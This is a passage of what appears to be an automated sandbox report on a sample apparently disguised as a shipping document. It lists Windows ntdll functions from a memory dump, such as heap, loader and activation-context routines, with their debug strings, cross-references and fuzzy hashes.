                                        • SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: Peb : %pSXS: ActivationContextData: %pSXS: AssemblyStorageMap : %p, xrefs: 017922B6
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.2037717484.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_16f0000_Doc 1Z881A080453968203.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: .Local$RtlpGetActivationContextDataStorageMapAndRosterHeader$SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: Peb : %pSXS: ActivationContextData: %pSXS: AssemblyStorageMap : %p$SXS: %s() passed the empty activation context
                                        • API String ID: 0-1239276146
                                        • Opcode ID: 5664e47b0dcf912ab1412f4f4c21ce202c0ff37e43499069d552ae061a06fc43
                                        • Instruction ID: fd250eb193926f936f7e31ca75b53a53e3bbd56c612242a5179b674cff0fc357
                                        • Opcode Fuzzy Hash: 5664e47b0dcf912ab1412f4f4c21ce202c0ff37e43499069d552ae061a06fc43
                                        • Instruction Fuzzy Hash: A2A1BE31944229DBDB65DF68D888BA9F7B0BF58314F2501E9DD08AB352D7709E84CF90
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 01754AD0 Relevance: 5.2, Strings: 4, Instructions: 228COMMON
                                        Download Yara Rule
                                        Strings
                                        • SXS: %s() called with invalid cookie type 0x%08Ix, xrefs: 01793437
                                        • SXS: %s() called with invalid flags 0x%08lx, xrefs: 0179342A
                                        • SXS: %s() called with invalid cookie tid 0x%08Ix - should be %08Ix, xrefs: 01793456
                                        • RtlDeactivateActivationContext, xrefs: 01793425, 01793432, 01793451
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.2037717484.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_16f0000_Doc 1Z881A080453968203.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: RtlDeactivateActivationContext$SXS: %s() called with invalid cookie tid 0x%08Ix - should be %08Ix$SXS: %s() called with invalid cookie type 0x%08Ix$SXS: %s() called with invalid flags 0x%08lx
                                        • API String ID: 0-1245972979
                                        • Opcode ID: 3c8e57c145ff1849f13a3891823b9cae461e41030f169a02d235a86d6a5e0989
                                        • Instruction ID: 07f265c53810513e4e3b694b74ac580ef6125ed54c84b33e5daad3f8c8d1ff76
                                        • Opcode Fuzzy Hash: 3c8e57c145ff1849f13a3891823b9cae461e41030f169a02d235a86d6a5e0989
                                        • Instruction Fuzzy Hash: D0613476604B129BDB22CF2CC885B3AF7E1BF80B50F158559EC569B291E770EC41CB91
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 017264AB Relevance: 5.2, Strings: 4, Instructions: 211COMMON
                                        Download Yara Rule
                                        Strings
                                        • ThreadPool: callback %p(%p) returned with preferred languages set, xrefs: 0178106B
                                        • ThreadPool: callback %p(%p) returned with the loader lock held, xrefs: 01781028
                                        • ThreadPool: callback %p(%p) returned with background priorities set, xrefs: 017810AE
                                        • ThreadPool: callback %p(%p) returned with a transaction uncleared, xrefs: 01780FE5
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.2037717484.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_16f0000_Doc 1Z881A080453968203.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: ThreadPool: callback %p(%p) returned with a transaction uncleared$ThreadPool: callback %p(%p) returned with background priorities set$ThreadPool: callback %p(%p) returned with preferred languages set$ThreadPool: callback %p(%p) returned with the loader lock held
                                        • API String ID: 0-1468400865
                                        • Opcode ID: 526fa3efb6e44a0765825f4fb5f37c448d6c7b5e90e1a8ed0673de6e97b40941
                                        • Instruction ID: bcbe1a320d2ebd5edc350c5e78a5339bc746e8df7e7a3d2501e45a3a26cd2abc
                                        • Opcode Fuzzy Hash: 526fa3efb6e44a0765825f4fb5f37c448d6c7b5e90e1a8ed0673de6e97b40941
                                        • Instruction Fuzzy Hash: 7A71E3B19043159FCB21EF19C888B9BBFA8EF94764F500469FD488B14AD334D589CBD2
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 0174245A Relevance: 5.1, Strings: 4, Instructions: 111COMMON
                                        Download Yara Rule
                                        Strings
                                        • Getting ApphelpCheckModule failed with status 0x%08lx, xrefs: 0178A992
                                        • minkernel\ntdll\ldrinit.c, xrefs: 0178A9A2
                                        • LdrpDynamicShimModule, xrefs: 0178A998
                                        • apphelp.dll, xrefs: 01742462
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.2037717484.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_16f0000_Doc 1Z881A080453968203.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: Getting ApphelpCheckModule failed with status 0x%08lx$LdrpDynamicShimModule$apphelp.dll$minkernel\ntdll\ldrinit.c
                                        • API String ID: 0-176724104
                                        • Opcode ID: af68c29aedbf4c66b0b088be0dfeaef9ddafbabf06e4d26b17a7971867058cc1
                                        • Instruction ID: 5b1b71c2057f22ad524ea62e24e14d29c56bae0c563780150a9632fe815c2e8b
                                        • Opcode Fuzzy Hash: af68c29aedbf4c66b0b088be0dfeaef9ddafbabf06e4d26b17a7971867058cc1
                                        • Instruction Fuzzy Hash: 3F312A77640202ABDB31AF5DD885E6AFBB8FB84714F26005AFD01A7249D7B05A41CB40
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 017329A0 Relevance: 4.7, Strings: 3, Instructions: 966COMMON
                                        Download Yara Rule
                                        Strings
                                        • HEAP: , xrefs: 01733264
                                        • Unable to release memory at %p for %Ix bytes - Status == %x, xrefs: 0173327D
                                        • HEAP[%wZ]: , xrefs: 01733255
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.2037717484.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_16f0000_Doc 1Z881A080453968203.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: HEAP: $HEAP[%wZ]: $Unable to release memory at %p for %Ix bytes - Status == %x
                                        • API String ID: 0-617086771
                                        • Opcode ID: 061dad94a5e6df17c526cb95543c0b923feeab6042300fe9f22b0fe3abeed9c8
                                        • Instruction ID: 6d9ef0ee985e5aafab084fec2d092322e071d686ca71c999b661f3be137bc984
                                        • Opcode Fuzzy Hash: 061dad94a5e6df17c526cb95543c0b923feeab6042300fe9f22b0fe3abeed9c8
                                        • Instruction Fuzzy Hash: 63929A71A046499FEB25CF68C444BAEFBF1FF88300F188099E959AB392D735A945CF50
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 01730770 Relevance: 4.2, Strings: 3, Instructions: 414COMMON
                                        Download Yara Rule
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.2037717484.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_16f0000_Doc 1Z881A080453968203.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: (UCRBlock->Size >= *Size)$HEAP: $HEAP[%wZ]:
                                        • API String ID: 0-4253913091
                                        • Opcode ID: 62b4da434b645814e0e45186ba4ba17f8dca39d1775f0804cb837393180d3e20
                                        • Instruction ID: 29321822eee6bba1b9de94d38d6221337ff291e1e0c6ee4fc84571cbb21b5b03
                                        • Opcode Fuzzy Hash: 62b4da434b645814e0e45186ba4ba17f8dca39d1775f0804cb837393180d3e20
                                        • Instruction Fuzzy Hash: ABF1BE70A40606DFEB25DF68C894B6AF7F5FF84304F1481A8E5169B386D734EA81CB90
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 01746962 Relevance: 4.0, Strings: 2, Instructions: 1492COMMON
                                        Download Yara Rule
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.2037717484.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_16f0000_Doc 1Z881A080453968203.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: $@
                                        • API String ID: 0-1077428164
                                        • Opcode ID: dcb329dc1fb1b03771abfadf3c46bfbb24f0c9a5df5cad27fb6d66352f472771
                                        • Instruction ID: 7758d3631844b52ac7abe1bbad1c800a5075a946ea4543a1b62b50a0e955725a
                                        • Opcode Fuzzy Hash: dcb329dc1fb1b03771abfadf3c46bfbb24f0c9a5df5cad27fb6d66352f472771
                                        • Instruction Fuzzy Hash: FAC27F716083419FE72ACF28C881BABFBE5AF89754F04896DF999C7241D734D844CB62
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 0171A197 Relevance: 4.0, Strings: 3, Instructions: 238COMMON
                                        Download Yara Rule
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.2037717484.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_16f0000_Doc 1Z881A080453968203.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: FilterFullPath$UseFilter$\??\
                                        • API String ID: 0-2779062949
                                        • Opcode ID: 18195bd714d1e777f06cde65608d3d29073deef7e9fec82329e3ee7ca454cbb2
                                        • Instruction ID: dc928f80127ced58e0ef87ff949d10475f54df84fb6e50b54ea6b6f822f14ad6
                                        • Opcode Fuzzy Hash: 18195bd714d1e777f06cde65608d3d29073deef7e9fec82329e3ee7ca454cbb2
                                        • Instruction Fuzzy Hash: 28A13E7191162A9BDF329F68CC88BE9F7B8EF48710F1041EAD909A7251D7359E84CF50
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 01740BCB Relevance: 4.0, Strings: 3, Instructions: 210COMMON
                                        Download Yara Rule
                                        Strings
                                        • minkernel\ntdll\ldrinit.c, xrefs: 0178A121
                                        • LdrpCheckModule, xrefs: 0178A117
                                        • Failed to allocated memory for shimmed module list, xrefs: 0178A10F
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.2037717484.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_16f0000_Doc 1Z881A080453968203.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: Failed to allocated memory for shimmed module list$LdrpCheckModule$minkernel\ntdll\ldrinit.c
                                        • API String ID: 0-161242083
                                        • Opcode ID: 6452f3f4cf98fc84dd1cc9ff705893313fc26eea79fcf157210cd7d3cf937e31
                                        • Instruction ID: 6b33cafa93b402765dddbb133e043f63865cef688884d5d85d4d4edb2d82b718
                                        • Opcode Fuzzy Hash: 6452f3f4cf98fc84dd1cc9ff705893313fc26eea79fcf157210cd7d3cf937e31
                                        • Instruction Fuzzy Hash: EB71DE71A00206DFDB25EF68C984AFEF7F8FB84204F14406DE942EB255E774AA42CB54
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 01730A5B Relevance: 3.9, Strings: 3, Instructions: 190COMMON
                                        Download Yara Rule
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.2037717484.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_16f0000_Doc 1Z881A080453968203.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: ((PHEAP_ENTRY)LastKnownEntry <= Entry)$HEAP: $HEAP[%wZ]:
                                        • API String ID: 0-1334570610
                                        • Opcode ID: be414006958ce051c306843d2d8c435ac6df46970c6e9b48cebc46c540d9592f
                                        • Instruction ID: 2d8cb52d0606861c33f70375b2176dade747ac617b6950b02afe8fd05d503d43
                                        • Opcode Fuzzy Hash: be414006958ce051c306843d2d8c435ac6df46970c6e9b48cebc46c540d9592f
                                        • Instruction Fuzzy Hash: E761CE70600301DFDB29DF28C844B6AFBE1FF85308F148599E4498F296D770E981CB91
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 0175C720 Relevance: 3.9, Strings: 3, Instructions: 141COMMON
                                        Download Yara Rule
                                        Strings
                                        • LdrpInitializePerUserWindowsDirectory, xrefs: 017982DE
                                        • minkernel\ntdll\ldrinit.c, xrefs: 017982E8
                                        • Failed to reallocate the system dirs string !, xrefs: 017982D7
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.2037717484.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_16f0000_Doc 1Z881A080453968203.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: Failed to reallocate the system dirs string !$LdrpInitializePerUserWindowsDirectory$minkernel\ntdll\ldrinit.c
                                        • API String ID: 0-1783798831
                                        • Opcode ID: 269372401ed8d4db53268a4c3476bd900d2167a89f271692cc105e4977fbde1c
                                        • Instruction ID: 69bde59306c79a7395239508ad7fd6823f835fa1ea3607fcc5cc1d038a67e0e1
                                        • Opcode Fuzzy Hash: 269372401ed8d4db53268a4c3476bd900d2167a89f271692cc105e4977fbde1c
                                        • Instruction Fuzzy Hash: 4E41F372544305ABD722EB68DC48B5BF7ECEF48A50F10492AF955D3299E7B0D900CB91
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 017DC188 Relevance: 3.9, Strings: 3, Instructions: 123COMMON
                                        Download Yara Rule
                                        Strings
                                        • PreferredUILanguages, xrefs: 017DC212
                                        • @, xrefs: 017DC1F1
                                        • \Registry\Machine\System\CurrentControlSet\Control\MUI\Settings, xrefs: 017DC1C5
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.2037717484.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_16f0000_Doc 1Z881A080453968203.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: @$PreferredUILanguages$\Registry\Machine\System\CurrentControlSet\Control\MUI\Settings
                                        • API String ID: 0-2968386058
                                        • Opcode ID: 4b814b5e3e37f7bcf8e4c098e9275b7e9808212f70324ff0982c34a2e18d5c85
                                        • Instruction ID: 2744613aea18f2d4fcb337b72f6fa15084ce138cda665eac1e1fdaa9dd50c5f5
                                        • Opcode Fuzzy Hash: 4b814b5e3e37f7bcf8e4c098e9275b7e9808212f70324ff0982c34a2e18d5c85
                                        • Instruction Fuzzy Hash: 23416371E0420DEBDB12DAD8C895FEEFBBDAB18700F14416EEA09B7244D774AA44CB50
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 017B4144 Relevance: 3.9, Strings: 3, Instructions: 121COMMON
                                        Download Yara Rule
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.2037717484.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_16f0000_Doc 1Z881A080453968203.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: @$LdrpResValidateFilePath Enter$LdrpResValidateFilePath Exit
                                        • API String ID: 0-1373925480
                                        • Opcode ID: 515579f8ab8152fa82f5f1732b57a79be4200f95fc45834dee2c64bdd5f09a34
                                        • Instruction ID: f8fa6b3dccd98f52f59df9a17c2f3ca44820691accc96306994187fa7b2ed058
                                        • Opcode Fuzzy Hash: 515579f8ab8152fa82f5f1732b57a79be4200f95fc45834dee2c64bdd5f09a34
                                        • Instruction Fuzzy Hash: 2A41F431A04658CBEB26DB99C888BEDFBB8FF95340F140469D903EB796D7349941CB50
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 017A4755 Relevance: 3.9, Strings: 3, Instructions: 121COMMON
                                        Download Yara Rule
                                        Strings
                                        • minkernel\ntdll\ldrredirect.c, xrefs: 017A4899
                                        • LdrpCheckRedirection, xrefs: 017A488F
                                        • Import Redirection: %wZ %wZ!%s redirected to %wZ, xrefs: 017A4888
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.2037717484.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_16f0000_Doc 1Z881A080453968203.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: Import Redirection: %wZ %wZ!%s redirected to %wZ$LdrpCheckRedirection$minkernel\ntdll\ldrredirect.c
                                        • API String ID: 0-3154609507
                                        • Opcode ID: b46b5da07d54777afab50feeec9354a20c09631ec7043561f3f0a17507323c3e
                                        • Instruction ID: 09272011ce66559ef06b665e42738e439b865f3bc093614727b83b3845bac2c1
                                        • Opcode Fuzzy Hash: b46b5da07d54777afab50feeec9354a20c09631ec7043561f3f0a17507323c3e
                                        • Instruction Fuzzy Hash: 5241D332A442919FCB21CE1CE840A26FBE4EFC9A50F49076DED4AD7215D7B2D800CB81
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 01730BBE Relevance: 3.8, Strings: 3, Instructions: 70COMMON
                                        Download Yara Rule
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.2037717484.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_16f0000_Doc 1Z881A080453968203.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: (ROUND_UP_TO_POWER2(Size, PAGE_SIZE) == Size)$HEAP: $HEAP[%wZ]:
                                        • API String ID: 0-2558761708
                                        • Opcode ID: 87542aeba5acd1e7d055acadcfbb066c3239633e015d3f1c0fd13a17bf9898b3
                                        • Instruction ID: 675aeddb6bd654cf8152107888ce909b9f089d7b66c6cefb89aa40b4b5abe9e9
                                        • Opcode Fuzzy Hash: 87542aeba5acd1e7d055acadcfbb066c3239633e015d3f1c0fd13a17bf9898b3
                                        • Instruction Fuzzy Hash: 3911AC32395142DFDB29EA1CC859B6AF3A5EF80616F1881A9F40ACB65ADB30D841CB50
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 017A20DE Relevance: 3.8, Strings: 3, Instructions: 41COMMON
                                        Download Yara Rule
                                        Strings
                                        • minkernel\ntdll\ldrinit.c, xrefs: 017A2104
                                        • LdrpInitializationFailure, xrefs: 017A20FA
                                        • Process initialization failed with status 0x%08lx, xrefs: 017A20F3
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.2037717484.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_16f0000_Doc 1Z881A080453968203.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: LdrpInitializationFailure$Process initialization failed with status 0x%08lx$minkernel\ntdll\ldrinit.c
                                        • API String ID: 0-2986994758
                                        • Opcode ID: 36f83d614d1e48cce970d1b8153e00c22428edc27ec49dbff6a4bc9c7bbd808a
                                        • Instruction ID: aba1b627513cf19e9f75397be503d447c436f93d16b0204a25c0910851822c3b
                                        • Opcode Fuzzy Hash: 36f83d614d1e48cce970d1b8153e00c22428edc27ec49dbff6a4bc9c7bbd808a
                                        • Instruction Fuzzy Hash: 3FF0FC76780309BBE725D64CDC5AF99B7ACFB81B54F90046DFB00772C6D5B0A640CA51
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 017303E9 Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 184COMMON
                                        Download Yara Rule
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.2037717484.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_16f0000_Doc 1Z881A080453968203.jbxd
                                        Similarity
                                        • API ID: ___swprintf_l
                                        • String ID: #%u
                                        • API String ID: 48624451-232158463
                                        • Opcode ID: 90bbda21c5f6cc3c504df7270ca4d87435bcc0373c26f78fab9371f111f3799a
                                        • Instruction ID: c6dae95a90671388209164b7f2a108ee5cbe164f6dc5b3dfb6bb940baae24d97
                                        • Opcode Fuzzy Hash: 90bbda21c5f6cc3c504df7270ca4d87435bcc0373c26f78fab9371f111f3799a
                                        • Instruction Fuzzy Hash: 8D715971A0014A9FDB11DFA8C994FAEFBF8BF48704F144065E905E7256EA78EE41CB60
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 0172A9D0 Relevance: 2.9, Strings: 2, Instructions: 421COMMON
                                        Download Yara Rule
                                        Strings
                                        • LdrResSearchResource Exit, xrefs: 0172AA25
                                        • LdrResSearchResource Enter, xrefs: 0172AA13
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.2037717484.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_16f0000_Doc 1Z881A080453968203.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: LdrResSearchResource Enter$LdrResSearchResource Exit
                                        • API String ID: 0-4066393604
                                        • Opcode ID: f0851d7fa35336b496b1da40b739ea430652871fa4fece9d03b7337824f811df
                                        • Instruction ID: 5c86fc2b37721d00ee9ebf37d6f4eb1811ad5a57431af5b2108e2b5e93df3245
                                        • Opcode Fuzzy Hash: f0851d7fa35336b496b1da40b739ea430652871fa4fece9d03b7337824f811df
                                        • Instruction Fuzzy Hash: 0BE17E71E40269AFEB22DE9CC984BAEFBBAFF14710F10446AE901E7651D734D942CB50
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 017EA352 Relevance: 2.8, Strings: 2, Instructions: 348COMMON
                                        Download Yara Rule
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.2037717484.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_16f0000_Doc 1Z881A080453968203.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: `$`
                                        • API String ID: 0-197956300
                                        • Opcode ID: f14427897cfa9f2fff493575096aafbbc27a418cd5181fa4476e78ff72e31fcd
                                        • Instruction ID: bed465f9165ee9c69c1ca7c9f8acdab98f908a023f900b2423c7336cc770c5a9
                                        • Opcode Fuzzy Hash: f14427897cfa9f2fff493575096aafbbc27a418cd5181fa4476e78ff72e31fcd
                                        • Instruction Fuzzy Hash: FAC1C1312043429BEB25CF28C849B6BFBE5AFD8318F184A2DF696CB291D774D505CB52
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 0179E6F2 Relevance: 2.7, Strings: 2, Instructions: 179COMMON
                                        Download Yara Rule
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.2037717484.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_16f0000_Doc 1Z881A080453968203.jbxd
                                        Similarity
                                        • API ID: InitializeThunk
                                        • String ID: Legacy$UEFI
                                        • API String ID: 2994545307-634100481
                                        • Opcode ID: c5e99d15303baae47ca3e29a68afa18a987e7220b2fd1f58a5966dfbbbd3f3b9
                                        • Instruction ID: 065c3699c00c5f04cb40dc7058710cceebe46d6c75e7407d6f24422f1acb81e7
                                        • Opcode Fuzzy Hash: c5e99d15303baae47ca3e29a68afa18a987e7220b2fd1f58a5966dfbbbd3f3b9
                                        • Instruction Fuzzy Hash: 5C615871E407199FDB24DFA8D844BAEFBB9FB48700F14406DE649EB291DB31A944CB50
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 017C43D4 Relevance: 2.7, Strings: 2, Instructions: 169COMMON
                                        Download Yara Rule
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.2037717484.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_16f0000_Doc 1Z881A080453968203.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: @$MUI
                                        • API String ID: 0-17815947
                                        • Opcode ID: fe58a87666f7d0f49e15d3bfe93412df10a64a712559aedc44cbf0d7de2e8249
                                        • Instruction ID: f8de8f86df775d5018cd26ca86befbc7f8d8503946e7820aa37758b90c3312ba
                                        • Opcode Fuzzy Hash: fe58a87666f7d0f49e15d3bfe93412df10a64a712559aedc44cbf0d7de2e8249
                                        • Instruction Fuzzy Hash: 75511871E0021DAEDB11DFA9CC94AEEFBBCEB54B54F100529EA11B7290D7309A05CB60
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 017204E5 Relevance: 2.7, Strings: 2, Instructions: 153COMMON
                                        Download Yara Rule
                                        Strings
                                        • kLsE, xrefs: 01720540
                                        • TerminalServices-RemoteConnectionManager-AllowAppServerMode, xrefs: 0172063D
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.2037717484.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_16f0000_Doc 1Z881A080453968203.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: TerminalServices-RemoteConnectionManager-AllowAppServerMode$kLsE
                                        • API String ID: 0-2547482624
                                        • Opcode ID: 6436ab65d4ed9c6f0ddd396acf2115b528fe362207e74a95b852018dc95dfaa4
                                        • Instruction ID: e28f8e93adf7a3a0787b8c05ee6ac45ee5116a9e94557eb56b6f5c8948f07373
                                        • Opcode Fuzzy Hash: 6436ab65d4ed9c6f0ddd396acf2115b528fe362207e74a95b852018dc95dfaa4
                                        • Instruction Fuzzy Hash: 53519C715047528FD734DF69C544AA7FBE4AF84304F20483EFAAA87241E7749546CFA2
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 0172A2C3 Relevance: 2.6, Strings: 2, Instructions: 118COMMON
                                        Download Yara Rule
                                        Strings
                                        • RtlpResUltimateFallbackInfo Enter, xrefs: 0172A2FB
                                        • RtlpResUltimateFallbackInfo Exit, xrefs: 0172A309
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.2037717484.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_16f0000_Doc 1Z881A080453968203.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: RtlpResUltimateFallbackInfo Enter$RtlpResUltimateFallbackInfo Exit
                                        • API String ID: 0-2876891731
                                        • Opcode ID: 7f86f1ca255b65a9fa8c5f8a96d389c9e2a2c75443de88b8eb20294f0901387d
                                        • Instruction ID: a97f029b315711bd60d75fbc3a913aacd86ffe127a9ecfaecc8e1e0fdcdc8ea5
                                        • Opcode Fuzzy Hash: 7f86f1ca255b65a9fa8c5f8a96d389c9e2a2c75443de88b8eb20294f0901387d
                                        • Instruction Fuzzy Hash: 2C41CC31A01669DBDB21DF69C844B6EFBB4FF84700F2440A9E900DB693E2B5D941CB90
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 0175A5D0 Relevance: 2.5, Strings: 2, Instructions: 38COMMON
                                        Download Yara Rule
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.2037717484.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_16f0000_Doc 1Z881A080453968203.jbxd
                                        Similarity
                                        • API ID: InitializeThunk
                                        • String ID: Cleanup Group$Threadpool!
                                        • API String ID: 2994545307-4008356553
                                        • Opcode ID: 1c30285a0538e7fc8715f07f6d864b96811073b7a29afebc4c834441be576b85
                                        • Instruction ID: bee52fb0c18b88431526460da0bd155e611e97da8c9603a898ac1adce85c60f2
                                        • Opcode Fuzzy Hash: 1c30285a0538e7fc8715f07f6d864b96811073b7a29afebc4c834441be576b85
                                        • Instruction Fuzzy Hash: 2001F4B2640740AFD351DF24CD49F16B7E8EB94715F058A3DAA49C7190E3B4D904CB56
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 0172C7C0 Relevance: 2.2, Strings: 1, Instructions: 960COMMON
                                        Download Yara Rule
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.2037717484.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_16f0000_Doc 1Z881A080453968203.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: MUI
                                        • API String ID: 0-1339004836
                                        • Opcode ID: 1dbb93d224046157780ce912050a169358675ca603c0fac296a0ff84d89b52c1
                                        • Instruction ID: 334f0514766d71f5b8d0de6f656e11b61c361e683e0fd138e9c2815f41c2e950
                                        • Opcode Fuzzy Hash: 1dbb93d224046157780ce912050a169358675ca603c0fac296a0ff84d89b52c1
                                        • Instruction Fuzzy Hash: DC826B75E002288FEB25CFA9C884BEDFBB5FF58310F148169D959AB355D7309982CB50
                                        Uniqueness

